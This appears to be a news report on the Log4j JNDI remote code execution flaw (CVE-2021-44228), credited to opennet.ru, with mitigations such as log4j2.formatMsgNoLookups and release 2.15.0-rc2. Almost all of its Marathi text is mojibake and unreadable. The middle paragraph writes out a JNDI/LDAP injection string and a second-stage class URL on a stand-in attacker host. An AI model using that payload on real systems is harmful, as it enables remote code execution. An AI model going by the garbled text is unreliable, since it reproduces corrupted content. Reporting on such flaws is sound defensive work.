Apache Log4j рдордзреНрдпреЗ, Java рдНрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕рдордзреНрдпреЗ рд▓реЙрдЧрд┐рдВрдЧ рдЖрдпреЛрдЬрд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдПрдХ рд▓реЛрдХрдкреНрд░рд┐рдп рдлреНрд░реЗрдорд╡рд░реНрдХ, рдПрдХ рдЧрдВрднреАрд░ рднреЗрджреНрдпрддрд╛ рдУрд│рдЦрд▓реА рдЧреЗрд▓реА рдЖрд╣реЗ рдЬреА рд▓реЙрдЧрдордзреНрдпреЗ тАЬ{jndi:URL}тАЭ рдлреЙрд░рдореЕрдЯрдордзреАрд▓ рд╡рд┐рд╢реЗрд╖ рд╕реНрд╡рд░реВрдкрд┐рдд рдореВрд▓реНрдп рд▓рд┐рд╣рд┐рд▓реНрдпрд╛рд╡рд░ рдЕрдирд┐рдпрдВрддреНрд░рд┐рдд рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЗ. рд╣рд╛ рд╣рд▓реНрд▓рд╛ рдЬрд╛рд╡рд╛ рдНрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕рд╡рд░ рдХреЗрд▓рд╛ рдЬрд╛рдК рд╢рдХрддреЛ рдЬреЗ рдмрд╛рд╣реНрдп рд╕реНрддреНрд░реЛрддрд╛рдВрдХрдбреВрди рдкреНрд░рд╛рдкреНрдд рдХреЗрд▓реЗрд▓реА рдореВрд▓реНрдпреЗ рд▓реЙрдЧ рдХрд░рддрд╛рдд, рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, рддреНрд░реБрдЯреА рд╕рдВрджреЗрд╢рд╛рдВрдордзреНрдпреЗ рд╕рдорд╕реНрдпрд╛рдкреНрд░рдзрд╛рди рдореВрд▓реНрдпреЗ рдкреНрд░рджрд░реНрд╢рд┐рдд рдХрд░рддрд╛рдирд╛.
рд╣реЗ рдиреЛрдВрджрд╡рд▓реЗ рдЧреЗрд▓реЗ рдЖрд╣реЗ рдХреА Apache Struts, Apache Solr, Apache Druid рдХрд┐рдВрд╡рд╛ Apache Flink рд╕рд╛рд░рдЦреЗ рдлреНрд░реЗрдорд╡рд░реНрдХ рд╡рд╛рдкрд░рдгрд╛рд░реЗ рдЬрд╡рд│рдЬрд╡рд│ рд╕рд░реНрд╡ рдкреНрд░рдХрд▓реНрдк рд╕реНрдЯреАрдо, Apple iCloud, Minecraft рдХреНрд▓рд╛рдпрдВрдЯ рдЖрдгрд┐ рд╕рд░реНрд╡реНрд╣рд░рд╕рд╣ рд╕рдорд╕реНрдпреЗрдореБрд│реЗ рдкреНрд░рднрд╛рд╡рд┐рдд рдЭрд╛рд▓реЗ рдЖрд╣реЗрдд. рдЕрдкрд╛рдЪреЗ рд╕реНрдЯреНрд░рдЯреНрд╕ рдлреНрд░реЗрдорд╡рд░реНрдХрдордзреАрд▓ рдЧрдВрднреАрд░ рдЕрд╕реБрд░рдХреНрд╖рд┐рддрддреЗрдЪреНрдпрд╛ рдЗрддрд┐рд╣рд╛рд╕рд╛рдЪреА рдкреБрдирд░рд╛рд╡реГрддреНрддреА рдХрд░реВрди, рдЕрд╕реБрд░рдХреНрд╖рд┐рддрддреЗрдореБрд│реЗ рдХреЙрд░реНрдкреЛрд░реЗрдЯ рдНрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕рд╡рд░ рдореЛрдареНрдпрд╛ рдкреНрд░рдорд╛рдгрд╛рд╡рд░ рд╣рд▓реНрд▓реЗ рд╣реЛрдК рд╢рдХрддрд╛рдд, рдЕрд╢реА рдЕрдкреЗрдХреНрд╖рд╛ рдЖрд╣реЗ, рдЬреА рдПрдХрд╛ рдЕрдВрджрд╛рдЬрд╛рдиреБрд╕рд╛рд░, рдлреЙрд░реНрдЪреНрдпреБрдирдЪреНрдпрд╛ 65% рджреНрд╡рд╛рд░реЗ рд╡реЗрдм рдНрдкреНрд▓рд┐рдХреЗрд╢рдиреНрд╕рдордзреНрдпреЗ рд╡рд╛рдкрд░рд▓реА рдЬрд╛рддреЗ. 100 рдХрдВрдкрдиреНрдпрд╛ рдЕрд╕реБрд░рдХреНрд╖рд┐рдд рд╕рд┐рд╕реНрдЯрдорд╕рд╛рдареА рдиреЗрдЯрд╡рд░реНрдХ рд╕реНрдХреЕрди рдХрд░рдгреНрдпрд╛рдЪреНрдпрд╛ рдкреНрд░рдпрддреНрдирд╛рдВрд╕рд╣.
рдПрдХ рдХрд╛рд░реНрдпрд░рдд рд╢реЛрд╖рдг рдЖрдзреАрдЪ рдкреНрд░рдХрд╛рд╢рд┐рдд рдХреЗрд▓реЗ рдЧреЗрд▓реЗ рдЖрд╣реЗ, рдкрд░рдВрддреБ рд╕реНрдерд┐рд░ рд╢рд╛рдЦрд╛рдВрд╕рд╛рдареА рдирд┐рд░рд╛рдХрд░рдгреЗ рдЕрджреНрдпрд╛рдк рд╕рдВрдХрд▓рд┐рдд рдХреЗрд▓реЗрд▓реА рдирд╛рд╣реАрдд рдпрд╛ рд╡рд╕реНрддреБрд╕реНрдерд┐рддреАрдореБрд│реЗ рд╕рдорд╕реНрдпрд╛ рд╡рд╛рдврд▓реА рдЖрд╣реЗ. CVE рдУрд│рдЦрдХрд░реНрддрд╛ рдЕрджреНрдпрд╛рдк рдирд┐рдпреБрдХреНрдд рдХреЗрд▓реЗрд▓рд╛ рдирд╛рд╣реА. рдирд┐рд░рд╛рдХрд░рдг рдлрдХреНрдд log4j-2.15.0-rc1 рдЪрд╛рдЪрдгреА рд╢рд╛рдЦреЗрдд рд╕рдорд╛рд╡рд┐рд╖реНрдЯ рдЖрд╣реЗ. рднреЗрджреНрдпрддрд╛ рдЕрд╡рд░реЛрдзрд┐рдд рдХрд░рдгреНрдпрд╛рд╕рд╛рдареА рдЙрдкрд╛рдп рдореНрд╣рдгреВрди, log4j2.formatMsgNoLookups рдкреЕрд░рд╛рдореАрдЯрд░ рд╕рддреНрдп рд╡рд░ рд╕реЗрдЯ рдХрд░рдгреНрдпрд╛рдЪреА рд╢рд┐рдлрд╛рд░рд╕ рдХреЗрд▓реА рдЬрд╛рддреЗ.
рд╕рдорд╕реНрдпрд╛ рдпрд╛ рд╡рд╕реНрддреБрд╕реНрдерд┐рддреАрдореБрд│реЗ рдЙрджреНрднрд╡рд▓реА рдЖрд╣реЗ рдХреА log4j рд▓реЙрдЧрдЪреНрдпрд╛ рд▓рд╛рдЗрди рдЖрдЙрдЯрдкреБрдЯрдордзреНрдпреЗ рд╡рд┐рд╢реЗрд╖ рдореБрдЦрд╡рдЯреЗ "{}" рд╡рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХрд░рдгреНрдпрд╛рд╕ рд╕рдорд░реНрдерди рджреЗрддреЗ, рдЬреНрдпрд╛рдордзреНрдпреЗ JNDI (рдЬрд╛рд╡рд╛ рдиреЗрдорд┐рдВрдЧ рдЖрдгрд┐ рдирд┐рд░реНрджреЗрд╢рд┐рдХрд╛ рдЗрдВрдЯрд░рдлреЗрд╕) рдХреНрд╡реЗрд░реА рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХреЗрд▓реНрдпрд╛ рдЬрд╛рдК рд╢рдХрддрд╛рдд. рдЕрдЯреЕрдХ "${jndi:ldap://attacker.com/a}" рдкреНрд░рддрд┐рд╕реНрдерд╛рдкрдирд╛рд╕рд╣ рд╕реНрдЯреНрд░рд┐рдВрдЧ рдкрд╛рд╕ рдХрд░рдгреНрдпрд╛рдкрд░реНрдпрдВрдд рдЙрдХрд│рддреЛ, рдЬреНрдпрд╛рд╡рд░ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдХреЗрд▓реНрдпрд╛рд╡рд░ log4j рдЖрдХреНрд░рдордгрдХрд░реНрддрд╛.com рд╕рд░реНрд╡реНрд╣рд░рд▓рд╛ Java рдХреНрд▓рд╛рд╕рдЪреНрдпрд╛ рдорд╛рд░реНрдЧрд╛рд╕рд╛рдареА LDAP рд╡рд┐рдирдВрддреА рдкрд╛рдард╡реЗрд▓. . рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рдЪреНрдпрд╛ рд╕рд░реНрд╡реНрд╣рд░рджреНрд╡рд╛рд░реЗ рдкрд░рдд рдХреЗрд▓реЗрд▓рд╛ рдорд╛рд░реНрдЧ (рдЙрджрд╛рд╣рд░рдгрд╛рд░реНрде, http://second-stage.attacker.com/Exploit.class) рд╡рд░реНрддрдорд╛рди рдкреНрд░рдХреНрд░рд┐рдпреЗрдЪреНрдпрд╛ рд╕рдВрджрд░реНрднрд╛рдд рд▓реЛрдб рдЖрдгрд┐ рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХреЗрд▓рд╛ рдЬрд╛рдИрд▓, рдЬреЛ рдЖрдХреНрд░рдордгрдХрд░реНрддреНрдпрд╛рд▓рд╛ рд╡рд░ рдЕрдирд┐рдпрдВрддреНрд░рд┐рдд рдХреЛрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рд┐рдд рдХрд░рдгреНрдпрд╛рд╕ рдЕрдиреБрдорддреА рджреЗрддреЛ рд╡рд░реНрддрдорд╛рди рдЕрдиреБрдкреНрд░рдпреЛрдЧрд╛рдЪреНрдпрд╛ рдЕрдзрд┐рдХрд╛рд░рд╛рдВрд╕рд╣ рдкреНрд░рдгрд╛рд▓реА.
рдкрд░рд┐рд╢рд┐рд╖реНрдЯ 1: рдЕрд╕реБрд░рдХреНрд╖рд╛ рдУрд│рдЦрдХрд░реНрддрд╛ CVE-2021-44228 рдирд┐рдпреБрдХреНрдд рдХреЗрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ.
рдкрд░рд┐рд╢рд┐рд╖реНрдЯ 2: рдкреНрд░рдХрд╛рд╢рди log4j-2.15.0-rc1 рджреНрд╡рд╛рд░реЗ рдЬреЛрдбрд▓реЗрд▓реЗ рд╕рдВрд░рдХреНрд╖рдг рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдгреНрдпрд╛рдЪрд╛ рдорд╛рд░реНрдЧ рдУрд│рдЦрд▓рд╛ рдЧреЗрд▓рд╛ рдЖрд╣реЗ. рдПрдХ рдирд╡реАрди рдЕрджреНрдпрддрди, log4j-2.15.0-rc2, рдЕрд╕реБрд░рдХреНрд╖рд┐рддрддреЗрд╡рд┐рд░реВрджреНрдз рдЕрдзрд┐рдХ рд╕рдВрдкреВрд░реНрдг рд╕рдВрд░рдХреНрд╖рдгрд╛рд╕рд╣ рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рдХреЗрд▓реЗ рдЖрд╣реЗ. рдЪреБрдХреАрдЪреНрдпрд╛ рдкрджреНрдзрддреАрдиреЗ рдлреЙрд░рдореЕрдЯ рдХреЗрд▓реЗрд▓реНрдпрд╛ JNDI URL рд╡рд╛рдкрд░рдгреНрдпрд╛рдЪреНрдпрд╛ рдмрд╛рдмрддреАрдд рдЕрд╕рд╛рдорд╛рдиреНрдп рд╕рдорд╛рдкреНрддреАрдЪреНрдпрд╛ рдЕрдиреБрдкрд╕реНрдерд┐рддреАрд╢реА рд╕рдВрдмрдВрдзрд┐рдд рдмрджрд▓ рд╣рд╛ рдХреЛрдб рд╣рд╛рдпрд▓рд╛рдЗрдЯ рдХрд░рддреЛ.
рд╕реНрддреНрд░реЛрдд: opennet.ru